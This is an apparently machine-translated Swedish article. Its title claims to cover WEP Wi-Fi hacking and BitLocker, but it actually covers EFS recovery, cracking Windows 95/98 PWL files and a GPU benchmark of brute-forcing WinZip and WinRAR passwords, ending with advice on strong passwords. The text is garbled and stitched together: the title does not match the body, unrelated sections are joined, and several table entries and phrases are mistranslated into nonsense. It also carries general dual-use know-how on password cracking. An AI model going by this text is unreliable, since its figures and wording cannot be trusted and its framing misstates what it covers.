Hur man hackar ett Wi-Fi-nätverk med WEP-kryptering. Hacka det krypterade filsystemet Hur Bitlocker fungerar

Hur man hackar ett Wi-Fi-nätverk med WEP-kryptering.  Hacka det krypterade filsystemet Hur Bitlocker fungerar
Hur man hackar ett Wi-Fi-nätverk med WEP-kryptering. Hacka det krypterade filsystemet Hur Bitlocker fungerar

Att hacka krypterad Filsystem(EFS) kan användas programvara Avancerad EFS Dataåterställning tillverkad av Elcomsoft. En demoversion av denna programvara finns på http://www.elcomsoft.com/aefsdr.html

Programstartfönster

Figur 3. Fönstret Advanced EFS Data Recovery

Programmet kan dekryptera skyddade filer endast om krypteringsnycklarna (inte alla, men åtminstone några av dem) fortfarande finns i systemet och inte har ändrats.

För filer krypterade under Windows 2000 operativsystem, om kontodatabasnyckeln (SYSKEY) är lagrad på en diskett, eller om alternativet "Lösenordsstart" har ställts in, måste du känna till ett av följande lösenord för att kunna för att dekryptera filerna:

    startlösenord eller Diskett lansera

    lösenordet för användaren som krypterade filerna

    Lösenord för återställningsagent (om möjligt)

Om datorn var en del av en domän när filerna krypterades, kanske du inte kan dekryptera filerna i vissa fall. Om lösenordet för användaren (som krypterade filerna) har ändrats efter kryptering kan det bli nödvändigt att ange det gamla lösenordet i programmet.

Windows 9x lösenordssprickning

Glöm dock inte att det finns ett mycket enklare sätt att knäcka nätverkslösenord. Eftersom i de flesta organisationer idag operativsystemet för klientmaskinen är Windows 95/98, är det följaktligen mycket lättare att organisera en hacking av lösenordsskyddet för detta operativsystem, eftersom lösenordet i en sådan fil endast lagras med versaler (med versaler) bokstäver), att veta att detta är mycket bekvämare och lättare att hämta senare krävs nätverkslösenord.

Det finns ett stort antal program för att knäcka Windows 95/98-lösenord, men låt oss fokusera på de mest populära av dem, PwlTool 6.0, på exemplet som forskningen utfördes på.

Figur 3 visar huvudarbetsfönstret för detta program utformat för att fungera på datorer som kör Windows 95/98, Windows NT/2000.

PwlTool är en uppsättning verktyg för lösenordsåterställning. Huvudprogrammet är RePwl. Detta program låter dig återställa ibland glömt eller förlorat inloggningslösenord för Windows 95 (originalversion och OSR2) och Windows 98. Det ger dig också möjligheten att visa lösenord som sparats i en PWL-fil.

Vad är en pwl-fil?

Windows 95/98 lagrar lösenordet i en PWL-fil. PWL-filer kan hittas i Windows-katalog. Deras namn lagras vanligtvis som USERNAME.PWL. PWL-filen är krypterad och det är inte lätt att extrahera lösenord från den. Den första krypteringsalgoritmen för Windows 95-versionen skapades på ett sådant sätt att det var möjligt att skapa program för att dekryptera PWL-filer. Men i OSR2-versionen har denna brist eliminerats.

Tillförlitlighetsbedömning av pwl-filer.

Lösenordsskyddssystemet i OSR2 är professionellt och pålitligt när det gäller kryptografi. Men trots detta innehåller den flera allvarliga nackdelar, nämligen:

    alla lösenord konverteras till versaler, detta minskar avsevärt antalet möjliga lösenord;

    MD5- och RC4-algoritmerna som används för kryptering tillåter snabbare lösenordskryptering, men tillförlitliga windows lösenord måste vara minst nio tecken långt.

Lösenordscachesystemet är i sig opålitligt. Lösenordet kan bara sparas om ingen obehörig personal kan komma åt din dator.

Introduktion

När du glömmer dina nycklar i bilen och dörrarna låses automatiskt verkar det inte roligt. Förra gången detta hände en av våra anställda fick han tillbringa större delen av dagen i väntan på en låssmed. Lyckligtvis kan vi lugna dig: den här mannen gjorde ett sådant misstag bara en gång, och sedan dess har han aldrig tappat sina nycklar ur sikte.

Det roliga är att det, med all deras medvetenhet och försiktighet, helt enkelt är omöjligt att hålla reda på deras elektroniska nycklar(lösenord) när vi använder en dator. Det är bara det att det blir fler och fler av dem, för det är känt att man inte ska använda ett lösenord i alla fall. Vanliga hus- eller kontorsnycklar är mycket lättare att hålla reda på. Även när de går vilse hamnar de ändå någonstans. Du behöver bara spåra din väg i omvänd ordning. Tja, eller in sista utvägen ring en specialist (till exempel en låssmed) som hjälper dig att övervinna ett hinder i form av ett lås i dörren.

Samma sak händer när det kommer till lösenord, åtminstone fram till ett visst ögonblick. spelar ingen roll, E-post eller ett bankkonto - vanligtvis är det en enkel process att återställa ett lösenord på Internet. Som regel har sajterna en länk "Glömt ditt lösenord?" ("Har du glömt ditt lösenord?"), vilket gör att du kan komma åt ditt konto igen. Men när det kommer till krypterade filer är utsikterna vanligtvis mindre ljusa. Vi stötte nyligen på ett sådant problem när vi försökte komma åt en gammal krypterad WinZip arkiv.

Innan vi går in i studien av problem med lösenordsåterställning vill jag notera att det finns många sätt att skydda din data. Om du behöver en heltäckande lösning kan vi erbjuda dig ett program som TrueCrypt (se artikel "Skydda dina data! TrueCrypt 7.0a prestandaanalys"), vilket är ännu mer attraktivt nu eftersom det stöder AES-NI. Och ändå är kryptering av arkiv fortfarande det vanligaste sättet att skydda data. Oavsett om du är en HR-anställd som skickar ut veckolöner eller en Hollywood-skådespelerska som försöker hålla sina privata iPhone-bilder säkra, är arkivkryptering snabbt och enkelt för dig. enkla vägen skydd.

Det råder dock oenighet om hur väl din data skyddas. Om du är överdrivet bekymrad över säkerheten för din information kommer du med största sannolikhet att gilla den starkaste av alla möjliga program kryptering. Du skulle antagligen anta att ju kraftfullare krypteringsmjukvaran är, desto svårare är det att knäcka en fil som är krypterad av den programvaran, och att AES-256-kryptering är bättre än AES-128. Men det är inte så. Tänk på kryptering som ett slags stort kassaskåp. Ju tjockare väggar desto svårare är det att tränga igenom. Skyddet av ett kassaskåp är dock bara lika bra som låset som skyddar det. Lösenordet fungerar på samma sätt. Detta är nyckeln till valvet. Ju längre lösenord du har, desto mer komplext är ditt lås och desto säkrare är din data.

De flesta användare antar att åttasiffriga lösenord är tillräckligt komplexa för att hackare ska misslyckas. Men detta är inte helt sant, och vi ska berätta varför.

Testa konfiguration

testa Hårdvara
CPU Intel Core i5-2500K (Sandy Bridge), 3,3 GHz, LGA 1155, 6 MB delad L3-cache
Moderkort Asus P8P67 Deluxe
Minne Kingston Hyper-X 8 GB (2 x 4 GB) DDR3-1333 @ DDR3 1333 1,5V
HDD Samsung 470 256 GB
grafikkort Palit GeForce GTX 460 1 GB
Asus GeForce GTX 570 1,28 GB
AMD Radeon HD 5870 1 GB
kraftenhet Seasonic 760 Watt, 80 PLUS
Systemprogramvara och drivrutiner
operativ system Windows 7 Ultimate 64-bitars operativsystem
DirectX DirectX 11
Förare NVIDIA 270.51
Katalysator 11.4
programvara
Version: 6.2
Version: 4.53
Accent Zip Password Recovery Version: 2.01
Accent RAR Password Recovery Version: 2.01
Parallell lösenordsåterställning Version: 1.6.0
winzip Version: 15.5 Pro
Kryptering: Zip 2.0 (standard), AES-128, AES-256
Kompression: okomprimerad, Zipx/PPMd (standard), Zip/deflate
WinRAR Version: x64 4.00
Kryptering: AES-128
Kompression: standard, lagring

Det är viktigt att notera det WinZip-programmet erbjuder tre olika krypteringsalternativ: Zip 2.0, AES-128 och AES-256, samt flera komprimeringsscheman. WinRAR är mycket enklare i detta avseende: det erbjuder bara AES-128-kryptering och olika nivåer av samma kompressionsschema. Vi har testat olika varianter för att visa hur de påverkar lösenordsknäckningshastigheten.

Arkivkryptering: WinZip och WinRAR

Data i en krypterad fil, som ett WinZip- eller WinRAR-arkiv, är vanligtvis mindre säker än information på en helt krypterad enhet. Det är därför vi talar om olika begrepp.

Datakomprimering är handlingen att slå in en fil eller serie filer i en behållare och ta bort redundanta informationsbitar för att bevara ett minnesområde. Du kan se den verkliga skillnaden bara genom att jämföra filerna med vilken hex-redigerare som helst. Observera att det blir färre rader på grund av komprimering.

Naturligtvis är idén med en filbehållare det som också låter dig öppna en krypterad WinZip-fil. Behållaren är inte krypterad, men innehållet är det. Det betyder att du inte behöver ett lösenord för att se innehållet i arkivet. Filnamn är inte skyddade.

WinRAR-programmet använder samma koncept. Men här har du möjlighet att kryptera filnamn. Detta kan göras genom att säkra tillgången till hela containern. Som sagt, du kan inte ens öppna filen om du inte har lösenordet.

Filnamn är en del av den så kallade metadatan. Det är som data om data, och det är den enda egenskapen som skiljer WinRAR från WinZip. Det senare låter dig se innehållet i det krypterade arkivet, eftersom det förra kan lagra metadata.

Detta i sig gör inte nödvändigtvis WinRAR till ett säkrare program. Men ihållande lösenordsknäckare försöker använda metadata eftersom den vanligtvis är okrypterad. När du väl hittar svagheter kan du vidta åtgärder för att utnyttja svagheter i hur kryptering tillämpas.

Du bör inte oroa dig för mycket om ditt lösenord är komplext och du använder ett bra krypteringsschema (AES-128 eller AES-256). Samtidigt, om du inte vill att andra ska veta vad du krypterade med WinZip, använd icke-beskrivande filnamn istället för något som "2011 1040 Inkomsträkning". Naturligtvis kommer ett starkt försvar att skära av båda metoderna. Om du gör filnamnen oansenliga vet du inte vad som finns i en krypterad fil förrän den är helt dekrypterad. Vanligtvis, om du gör åtkomst mindre bekväm, kommer det att innebära att det också blir mindre bekvämt för dig.

Så vad händer när du, i enlighet med vår varning, "drar åt muttrarna" på alla dina digitala lås och sedan glömmer hur du öppnar dem igen?

Undersöker längden på lösenord

Lösenordsåterställning kan vara en ganska komplicerad process. Kryptering kan jämföras med ett Sudoku-pussel. Ju större och mer invecklat pusslet är, desto svårare är det att kringgå krypteringsschemat. Det finns dock två sätt att prova detta.

Vanligtvis under den första försöker hackare hitta något gemensamt mönster. Denna metod kan delas in i flera olika klasser av attacker, varav några du kanske har hört talas om i nyheterna, till exempel sidokanalsattacker. Dessa metoder är komplexa och inte av det slag som används av vanliga datoranvändare. Endast en liten grupp människor vet hur man tillämpar dem och tillämpar dem.

Ett mycket mer primitivt tillvägagångssätt för att kringgå kryptering är bara "gissa och kolla". Denna metod är känd som urvalsmetoden. Föreställ dig att du listar varenda kombination av siffror som kan användas för att lösa ovanstående Sudoku-pussel, från att använda ettor i alla riktningar till alla nior. Det finns sätt att dölja "checken" för att göra attacken mer komplex. Men sådana enkla program som WinZip och WinRAR har inte denna fördel. Om du är ihärdig kan du fortsätta gissa lösenord tills cancern på berget visslar. Det finns ingen gräns för antalet alternativ du kan skicka in för granskning. Således är det verkliga problemet med lösenordsåterställning hastigheten med vilken du kan gissa rätt alternativ.

Att manuellt kontrollera lösenord är i bästa fall ett dumt försök, speciellt om du har att göra med ett långt lösenord. Det är här program för lösenordsåterställning kommer in i bilden. De automatiserar processen att "gissa" lösenord.

Tillgängliga tecken med det engelska alfabetet Möjliga lösenord med två tecken Möjliga lösenord med fyra tecken Möjliga lösenord på sex tecken
Små bokstäver 676 456 976 308 915 776
Små och stora bokstäver 2 704 7 311 616 19 770 609 664
Små bokstäver, versaler och siffror 3 844 14 776 336 56 800 235 584
Alla ASCII-tecken 8 836 78 074 896 689 869 781 056

Brute-force attacker är baserade på sannolikhet. Ju längre lösenord, desto fler lösenord att kontrollera. Här förlitar de sig på idén om permutation, det vill säga arrangemanget av objekt i en viss ordning. Föreställ dig att lösenord är anagram. Om vi ​​ger dig bokstäverna a, b och c, hur många olika ordnade arrangemang kan du göra? Med bara tre bokstäver kan du göra sex permutationer av uppsättningen (a,b,c), nämligen: , , , , och .

Det är enkelt att beräkna antalet möjliga lösenord. Upprepningar är tillåtna, så formeln skulle vara: n(lösenordslängd), där n är antalet möjliga tecken. Som du kan se, med sex tecken, har vi redan att göra med miljarder alternativ om lösenordet innehåller små och stora bokstäver. Om du också använde specialtecken och siffror (alla ASCII-tecken (American Standard Code for Information Interchange)), så kommer du att upptäcka att antalet kandidatlösenord kommer att öka dramatiskt till? biljoner (10 till 12:e potensen). Och glöm inte att om du inte vet längden på ditt lösenord måste du prova alla möjliga kombinationer, börja med ett lösenord med ett tecken, tills du kommer till det lösenord du väljer.

Förstår du vad vi vill?

Lösenordsknäckning: CPU-baserad datoranvändning

Det finns otaliga program att välja mellan för att hjälpa dig att återställa dina lösenord, men de två mest populära kallas Advanced Archive Password Recovery och Visual Zip Password Recovery Processor. När vi förlorade lösenordet till en av WinZip-filerna kunde vi se i aktion det första programmet som återställde ett lösenord på sju tecken på 20 minuter. Men det gav oss en tankeställare och väckte vår nyfikenhet. Hur snabbt sökte vår dator efter lösenord? Vad skulle hända om vi använde en starkare krypteringsmetod som AES-128?

Ännu viktigare är nästa fråga: tar det verkligen bara 20 minuter att öppna alla våra lösenordsskyddade arkiv, och sedan kommer de att nås av någon som inte borde ha tillgång till det?



Hastighet för direkt val av lösenord, lösenord per sekund Advanced Archive Password Recovery Visual Zip Password Recovery Processor
Kompression: nej
Kryptering: Zip 2.0
28 357 311 20 943 157
Kompression: nej
Kryptering: AES-128
9 715 fel
Kompression: nej
Kryptering: AES-256
9 713 fel
Kompression: Zip
Kryptering: Zip 2.0
28 492 733 20 888 938
Kompression: Zip
Kryptering: AES-128
9 733 fel
Kompression: Zip
Kryptering: AES-256
9 760 fel
Kompression: RAR-lagring
Kryptering: AES-128
213 -
Kompression: RAR-lagring
202 -
Kompression: RAR-standard
Kryptering: AES-128
213 -
Kompression: RAR-standard
Kryptering: AES-128, filnamn
202 -

Som du kan se påverkar komprimering endast lite hastigheten med vilken du kan försöka gissa lösenord, men den största nackdelen är gammalt upplägg Zip 2.0-kryptering. Som ett resultat kan ett lösenord på fem tecken hittas på bara några sekunder, eftersom du kan bearbeta data med en hastighet av cirka 28 miljoner lösenord per sekund med kärnprocessor i5-2500K. Visual Zip hittades också rätt lösenord använder Zip 2.0-krypteringsmetoden, men på grund av programvaruproblem kunde det här verktyget inte återställa lösenordet för en fil krypterad med AES-128.

Detta är naturligtvis inte hela historien. Vi är inte intresserade av CPU-prestanda bara för att skryta om vad en ny CPU kan göra (även om det faktiskt kan leda oss till ett intressant riktmärke). Och så vi är oroliga för CPU-prestanda eftersom det påverkar hastigheten med vilken vi kan hitta lösenordet.

Total brute-force-tid om den körs med 28 miljoner lösenord/sek. Lösenord från 1 till 4 tecken Lösenord från 1 till 6 tecken Lösenord från 1 till 8 tecken Lösenord från 1 till 12 tecken
Små bokstäver Omedelbart 11 sekunder 2 timmar 112 år gammal
Små och stora bokstäver Omedelbart 12 minuter 22 dagar 451 345 år
Alla ASCII-tecken 3 sekunder klockan 7 8 år 701 193 345 år

Även om du antar att du kan försöka bearbeta 28 miljoner lösenord per sekund kommer dina chanser att gissa rätt lösenord bli mer och mer oklara när du går vidare till längre lösenord och teckenuppsättningar. Att spendera en hel månad på att försöka knäcka ett lösenord på åtta tecken, varav alla åtta är bokstäver, är inte så hemskt om den skyddade informationen verkligen är viktig. Men 700 miljoner år är, förstår du, en för stor siffra för att låta dig vänta.

Lyckligtvis låter Advanced Archive Password Recovery dig pausa processen och spara platsen där sökningen avbröts. Och om du har flera hemdatorer till ditt förfogande, kan du avsevärt minska söktiden genom att fördela mängden arbete mellan dem. Är du rädd än?

Lösenordsknäckning: GPGPU-teknik


Lösenordsknäckning: CPU i5-2500K.

Målet med en brute-force attack är att snabbt brute force det maximala antalet lösenord. Men moderna processorer är inte väl optimerade för detta. Även om vår Sandy Bridge-arbetsstation kan behandla cirka 28 miljoner lösenord per sekund, använder den fortfarande inte alla tillgängliga CPU-cykler. Kom ihåg att vi bara gissar och kollar. Ovanstående skärmdump av CPU-användningsdata illustrerar detta: medan klockhastigheten naturligtvis hjälper till denna process, programmet kan dra fördel av parallellitet, så att ha fler kärnor kommer att hjälpa till att påskynda lösenordssökningsprocessen.

Som vi vet, när det kommer till att köra uppgifter parallellt, vilket processorer ibland gör mycket bra, skulle de aritmetiska logikenheterna på grafikkortet i de flesta fall kunna fungera bättre. AMD och Nvidia hade hela videoomkodningsteam som var säkra på det, tills Intel bevisade att några dedikerade logiska kretsar i sin Sandy Bridge-arkitektur vida kunde överträffa en tungvikts GPU. Men nu visar det sig att vi har en annan applikation som är perfekt lämpad att fungera på moderna GPU:er.

Det fanns en tid då lösenordsknäckning med GPGPU-teknik (General-purpose graphics processing units - general-purpose computing på GPU) inte gick utöver den vetenskapliga världen: doktorander gjorde stora ansträngningar för att arbeta med specialprogram som aldrig har kommit till kommersiell användning. Men nu har allt förändrats. Det finns för närvarande två GPGPU-verktyg som alla med en kreditkort: Parallell lösenordsåterställning och accentlösenordsåterställning.

Parallel Password Recovery är ett program exklusivt optimerat för Nvidias CUDA parallella datorarkitektur. Vi säger inte att CUDA-kärnor är bättre än AMD:s Stream-utveckling. Nvidia måste dock krediteras. Dess "invasion" i området för allmän datoranvändning med hjälp av GPU började för länge sedan, och företaget gav utvecklare tillgång till många lågnivåbibliotek som var nödvändiga för att lära sig denna teknik. AMD hämnades mycket senare. Faktum är att vi fortfarande stöter på vissa problem när vi använder Stream-accelerationen som ingår i populära omkodningsapplikationer. Detta förklarar delvis varför en annan lösning, Accent Password Recovery, fortfarande lutar åt Nvidias utveckling. Även om det här verktyget känner igen CUDA och Stream, är bara Nvidias hårdvara optimerad för att bryta in i en Zip 2.0-krypterad fil.

Hacka med ett GeForce GTX 460 grafikkort
Parallell lösenordsåterställning Accent Password Recovery
Kompression: Zip
Kryptering: Zip 2.0
24 111 280 516 096 000
Kompression: Zip
Kryptering: AES-128
185 072 166 800
Kompression: Zip
Kryptering: AES-256
185 177 156 138
Kompression: RAR-standard
Kryptering: AES-128
3 493 4 231

Och förresten, vilken typ av hastighet har Zip 2.0-kryptering! Med GeForce GTX 460-grafikkortet kan vi redan gissa lösenord med en hastighet av cirka 500 miljoner kombinationer per sekund. För att ge dig en bättre uppfattning om vad detta betyder, låt oss säga att vi kan gissa någon av de möjliga kombinationerna av ASCII-tecken för ett lösenord med en längd på ett till 7 tecken på mindre än 48 timmar. När det gäller lösenordet på åtta tecken, här kommer vi att prata om 168 dagar.

GeForce GTX 460 grafikkort
Direkt gissning av lösenord, alla ASCII-tecken, total gissningstid
Om brute force är 180 000 lösenord per sekund... 50 dagar, 20 timmar 1284 år, 79 dagar
Om det är brute force 24 miljoner lösenord per sekund... 9 timmar, 9 minuter 9 år, 230 dagar
Om det är brute force 500 miljoner lösenord per sekund... 26 minuter, 21 sekunder 168 dagar, 17 timmar

Utan tvekan är Zip 2.0 en mycket föråldrad krypteringsalgoritm. WinZip stöder det endast av kompatibilitetsskäl. AES-standarden är den nya "favoriten" som alla siktar på. Detta schema är mycket svårare att använda i parallella uppgifter, även om mjukvaruutvecklare naturligtvis gör sådana försök.

Prestanda blir lidande särskilt när vi börjar försöka återställa ett AES-krypterat lösenord. muspekaren i vår testsystem började bokstavligen "snabbla". Brute-force attacker mot AES-krypterade filer är ganska långsamma. Det kommer att ta mer än 13 år att prova alla möjliga kombinationer av ASCII-tecken för ett lösenord med en längd på 1 till 7 tecken.

2 x GeForce GTX 570 SLI
Direkt gissning av lösenord, lösenord per sekund Parallell lösenordsåterställning Accent Password Recovery
Kompression: Zip
Kryptering: Zip 2.0
45 412 290 1 492 279 088
Kompression: Zip
Kryptering: AES-128
495 133 513 936
Kompression: Zip
Kryptering: AES-256
496 244 513 880
Kompression: RAR-standard
Kryptering: AES-128
13 904 14 605

De allmänna planberäkningarna med GPU:n är förknippade med fenomenet parallellism och därför, om en av er har 480 CUDA-kärnor på grafikkortet, då om du kombinerar kärnorna från två kort, får vi ett värde på 960, vilket måste vara mycket bättre, eller hur?

När vi parar ihop två GeForce GTX 570-grafikkort och aktiverar SLI verkar Zip 2.0-kryptering inte längre vara säker. Tack vare den optimerade koden kan vi kontrollera 1,5 miljarder lösenord per sekund. Det verkar till och med lite absurt. Vi har nu minskat söktiden för lösenord från ett till åtta tecken med alla ASCII-tecken till nästan två månader.

Samtidigt ser AES-skyddet fortfarande väldigt attraktivt ut. Om lösenordet består av mer än sju tecken måste du spendera nästan fem år på att ersätta kombinationer med en hastighet av 500 000 lösenord per sekund.

Nvidia vs AMD: Effektiviteten av en brute-force attack

Detta lilla exempel har med skalning att göra. Vill du ha många kärnor och vill att de ska vara snabba? Även om detta kommer att påverka våra resultat till viss del, låt oss lägga arkitekturen åt sidan för ett ögonblick. Medan två GeForce GTX 570 bara har 2,8 gånger antalet CUDA-kärnor i en enda GTX 460, har vi tre gånger så hög prestanda eftersom alla avancerade grafikkort också går 8% snabbare.

När det gäller GeForce GTX 590 fick vi liknande resultat på SLI-konfigurationen. 590-grafikkortet har fler kärnor, men de är något långsammare. Om du letar efter ett förstklassigt grafikkort är Nvidias framgång mycket mer märkbar, med dess CUDA-modell med 1 024 kärnor som toppar listan. Samtidigt, om du är villig att stå ut med hög värme och en stor prislapp, borde två GeForce GTX 590:or i SLI-konfiguration överträffa två GTX 570:or med en faktor två.

Som jämförelse finns det 3072 Stream-processorer som körs på 830 MHz på AMD:s bästa grafikkort, Radeon HD 6990. Glöm inte att AMD:s kärna inte liknar Nvidias, så vi kan inte jämföra och matcha dem som 1:1.

Vi hann köra ett par Radeon HD 5850 i CrossFire, men resultatet var ändå imponerande. Med 2880 Stream-processorer knäckte vi cirka 1,1 miljoner lösenord per sekund när vi försökte knäcka en AES-128-krypterad WinZip-fil. Två Radeon HD 6990 grafikkort - detta är förmodligen det bästa valet om du vill använda din dator till sin fulla potential samtidigt som du återställer ditt AES-lösenord. Men även med det mest optimistiska scenariot kommer du att kunna arbeta med hastigheter något högre än 3 miljoner lösenord per sekund. Det räcker fortfarande inte för att knäcka ett lösenord på åtta tecken på mindre än ett år.

grafikkort Kärnor som stöder CUDA/Stream-teknologier Kärnprestanda vid bearbetning av shaders
GeForce GTX 460 1 GB 336 1350 MHz
GeForce GTX 570 480 1464 MHz
GeForce GTX 590 1 024 1214 MHz
Radeon HD 5850 1 440 725 MHz
Radeon HD 5970 1 600 725 MHz
Radeon HD 6990 3 072 830 MHz

Ett par GeForce GTX 570 i SLI-konfiguration är rätt uppsättning att se i en speldator. Även om du förmodligen inte förväntar dig att gamla lösenord längre än sju tecken ska ta lång tid att återställa, kom ihåg att vi fortfarande pratar om det värsta scenariot. Det är som om vi letade efter ett lösenord mellan 00 och 99, och det korrekta svaret visade sig vara 99. Vanligtvis når det inte hit och lösenordet ligger någonstans i mitten under sökningen.

Lösenordsåterställningsprogram som de som anges ovan utför inte en fullständig sekventiell sökning eftersom det inte är det också bra strategi för att återställa ditt lösenord. Faktum är att en framgångsrik återhämtning med största sannolikhet kommer att ske någonstans i mitten av sökningen. Men genom att tillhandahålla den tidsram vi stod inför ändrade vi inte den slutsats vi kom fram till. Enligt vår åsikt är Zip 2.0-kryptering absolut opålitlig. Även om det kommer att ta lång tid att ta reda på ett lösenord på 9 eller 10 tecken, är det definitivt något som några spelkompisar kan hantera.

2 x GeForce GTX 570 SLI
Direkt gissning av lösenord, total gissningstid Lösenordslängd från 1 till 6 tecken Lösenordslängd från 1 till 8 tecken
500 000 lösenord per sekund 18 dagar, 7 timmar 462 år, 116 dagar
45 miljoner lösenord per sekund 4 timmar, 52 minuter 5 år, 49 dagar
1,5 miljarder lösenord per sekund 8 minuter 56 dagar, 5 timmar

Säkerhetsproblem: WinZip och WinRAR

Lösenord dekrypterar inte krypterade filer direkt. Du måste generera en dekrypteringsnyckel från det ursprungliga lösenordet, och det är precis vad vi har pratat om på de föregående sidorna. Det var här vi stötte på flaskhalsen för brute-force attacker. Nyckelgenerering tar 99 % av den totala dekrypteringstiden, så att använda denna kraftfulla hårdvara är det det enda sättet minska inkörningstiden.

Medan båda programmen - WinZip och WinRAR - använder SHA-1-transformationer för att härleda nycklar, skiljer sig mekanismerna för varje program något från varandra. WinZip är baserat på PBKDF2 (Password-Based Key Derivation Function 2.0) och använder 2002 SHA-1-transformationsderivator för att generera nyckeln. Detta värde är dock konstant för lösenord oavsett längd (upp till 64 tecken), vilket är anledningen till att ett 10-teckens lösenord med AES-256-kryptering är lika lätt att knäcka som med AES-128.

Som jämförelse använder WinRAR sitt eget nyckelhärledningsschema, vilket kräver (lösenordslängd * 2 + 11)*4096 SHA-1-transformationer. Det är därför det tar mer tid att brute-force krypterade WinRAR-arkiv.

2 x GeForce GTX 570 SLI
Direkt gissning av lösenord, lösenord per sekund Parallell lösenordsåterställning Accent Password Recovery
Kompression: Zip
Kryptering: AES-128
495 133 513 936
Kompression: Zip
Kryptering: AES-256
496 244 513 880
Kompression: RAR-standard
Kryptering: AES-128
13 904 14 605

I praktiken är det mer troligt att du glömmer ditt eget lösenord än att din krypterade fil hamnar i händerna på någon med för mycket ledig tid och tillräckligt kraftfull hårdvara för att knäcka din fil. Även om en sådan angripare hade den bästa hårdvaran av alla tillgängliga val, är den maximala tiden för att hitta ett nio tecken långt lösenord för en AES-128-krypterad WinZip-fil redan över 1 000 år. Dina utsikter för lösenordsåterställning är dock ganska anständiga om du har åtminstone en ungefärlig uppfattning om vad ditt lösenord kan vara.

Om du till exempel kommer ihåg följande information om ditt 10 tecken långa ASCII-lösenord:

  • Det börjar med "e";
  • Slutar med "a";
  • Innehåller inte versaler;
  • Den innehåller ett tecken "!";
  • Innehåller inte någon av följande bokstäver: B, C, D, Q, T, U, V, W, X, Y, Z.

Då behöver du bara söka bland 1 biljon möjliga lösenord istället för 205 biljoner. Detta är en ganska genomförbar uppgift med ett par GeForce grafikkort GTX 570. Om du använde WinRAR-arkiv, då har du nästan inget hopp om att återställa lösenordet, om det inte är kort.

Slutsats

Efter en veckas försök att återställa det gamla WinZip-lösenordet blev vi ganska förvånade. Vi lever alla i en värld där säker information inte är så säker, så det är svårt att inte vara försiktig med GPGPU-tekniker eftersom våra GPU:er blir mer och mer kraftfulla.

Tidigare fanns det inget sätt att komma på ett lösenord på 10 ASCII-tecken inom rimlig tid. Detta var endast möjligt med skräddarsydd hårdvara. Detta är precis vad Electronic Frontier Foundation gjorde när de investerade 1998 i sin specialiserade Deep Crack-maskin. För en slutkostnad på cirka 250 000 USD satte en grupp säkerhetsexperter ihop en maskin som kunde skanna cirka 90 miljarder lösenord per sekund, tack vare mer än 1 800 AWT-4500-chips som arbetar tillsammans.

Vi kan inte uppnå samma prestationsnivå på vår arbetsstation, men två GeForce GTX 570-grafikkort i SLI-konfiguration körs med cirka 1,5 miljarder lösenord per sekund om vi har att göra med Zip 2.0-kryptering. Detta är 1/60 av prestandan för mindre än 1/100 av kostnaden för den berömda maskinen. Uppenbarligen jämför vi helt makalösa saker. Dessutom är Zip 2.0-kryptering utfasad. En sak är klar: tungviktsarkitekturer GPU:er parallell beräkning kommer att fortsätta driva på för ökad "prestandatäthet" till allt mer överkomliga priser för masskonsumenten, så att vi någon gång kommer att ha råd med 90 miljarder lösenordssökningar per sekund på vår stationära dator.

Så vad har vi lärt oss? Först och främst kommer vi att hålla oss borta från Zip 2.0-kryptering. Detta är ett äldre krypteringsschema, och till och med WinZip själv föreslår att du använder AES för att förhindra brute-force-attacker.

Riktade hackningsförsök är en annan historia. De flesta använder lösenord som innehåller ord, och därför är sådana lösenord känsliga för ordboksattacker, oavsett vilket krypteringsschema du använder. Antalet ord i det engelska språket är mindre än 1 miljon. Däremot kan GeForce GTX 460-grafikkortet behandla minst 150 000 lösenord per sekund med AES-kryptering. Även om du lägger till några ändringar tar det bara en dag att knäcka ordlåset och gissa lösenordet. Varför? Ja, eftersom hela ordet i funktionsplanär detsamma som en enstaka bokstav, till exempel "a".

Helst bör du undvika situationer som denna om du försöker säkra dina filer:

  • Använd inte ordbok. I Oxford Dictionary på engelska" (The Oxford English dictionary) innehåller mindre än 300 000 poster, om du räknar orden i nuvarande användning, föråldrade och härledda ord. För GeForce GTX 460 kommer det inte att vara svårt att hitta ett sådant ordlösenord;
  • Försök att inte använda ord följt av siffror. Att lägga till en 1 i slutet av ett lösenord gör det inte säkrare. Vi kan fortfarande knäcka ditt lösenord genom att gå igenom hela den engelska ordboken och alla kombinationer av siffror på en halv dag med ett par GeForce GTX 570-grafikkort;
  • Undvik dubbla ord och enkla bokstavsersättningar. Alternativet "PasswordPassword" fördubblar bara antalet ord vi måste skanna. Även ett lösenord som [e-postskyddad]är inte tillförlitlig. Lösenordsknäckare känner till alla vanliga kombinationer. Så välj inte på det sättet;
  • Använd inte en vanlig sekventiell rad på ditt tangentbord. Det är inte så svårt att lägga till "qwerty" i ordlistan över lösenord att kontrollera. Detta är den andra vägen, som inte bör följas;
  • Använd inte den vanliga nummerserien. Kanske är 314159 ganska lätt att komma ihåg. Ändå är det ett "PI"-nummer, men det är också ett värde som är ganska lätt att kontrollera;
  • Undvik att använda någon form av personlig information som din bils registreringsskylt, personnummer, fd telefonnummer, födelsedatum och så vidare. Vi lever i en värld där det finns mycket information allmänhetens tillgång. Om du har en social profil Facebook-nätverk eller Twitter ökar mängden information som är tillgänglig för tredje part ännu mer.

Ett filkrypteringsschema är bara så bra som lösenordet som skyddar filen. Detta är en svag punkt i ett symmetriskt lösenord där krypteringsnyckeln är densamma som dekrypteringsnyckeln. Om du envist fortsätter att överbekymra dig om säkerheten för dina data, så kommer troligen säkerhetsnivån för PGP-systemet (Pretty Good Privacy) eller certifierad kryptering att passa dig. För dagligt bruk är det här alternativet obekvämt, om inte du och ditt företag ska byta till en PKZIP-arkiverare. Då bör lösenordslängden vara ditt huvudproblem.

Om du använder hela ASCII-teckenuppsättningen kommer din lösenordsstyrka att vara 94 (längden på lösenordet), eftersom varje ytterligare tecken gör lösenordet 94 gånger säkrare. Genom att lägga till några specialtecken, kommer du att göra det "omöjligt att knäcka ditt lösenord på grund av den stora mängden beräkning" för hackare som försöker brute-force din fil. Om 7 298 831 534 994 528 möjliga kombinationer (i ett till nio teckens lösenord) inte räcker för att göra dig lugn, använd ett 10-teckens lösenord och hackare kommer då att kunna försöka välja mellan 699 823 827 359 474 784 kombinationer.

